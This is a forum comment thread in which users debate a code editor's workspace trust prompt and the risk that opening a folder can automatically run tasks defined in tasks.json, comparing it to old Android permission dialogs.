Comment by dfajgljsldkjag

10 hours ago

It is scary that a text editor can run hidden code just by opening a folder. We traded our safety for convenience and now we are paying the price. Users will always click the button to trust a file if they think it helps them work faster. We cannot blame them when the software design makes it so easy to make a mistake.

10 comments

dfajgljsldkjag

Reply
EE84M3i  10 hours ago

Doesn't it ask you if you trust a folder when you open it?

  • nottorp  2 hours ago

    I always wondered why. Now I finally know that it auto runs code in that folder.

    Who thought this is a good idea and why wasn't it specified in ALL CAPS in that dialog?

    Is it even documented anywhere?

    Very infrequent vscode user here, beginning to think it's some kind of Eclipse.

  • dfajgljsldkjag  10 hours ago

    You are right that the computer asks you. But people click yes because they are used to ignoring warning signs. The software relies on people making perfect choices every time and that never happens.

    • whs  9 hours ago

      It should tell me what should I look before I trust it. Not trusting the workspace means I might as well use Notepad to open it. I wouldn't think that tasks.json include autorun tasks in addition to build actions.

  • IshKebab  4 hours ago

    Yeah but it's one of those useless permission requests along the lines of "Do you want this program to work or not?"

    They're pawning off responsibility without giving people a real choice.

    It's like the old permission dialog for Android that was pretty much "do you want to use this app?". Obviously most people just say yes.

    There's a reason Google changed that.

    To be fair I'm sure Microsoft would switch to a saner permission model if they could but it's kind of too late.

    • azornathogron  32 minutes ago

      It's not a false choice - "Trust" and "don't trust" are both perfectly viable options. The editor works fine in restricted mode, you just won't have all your extensions enabled.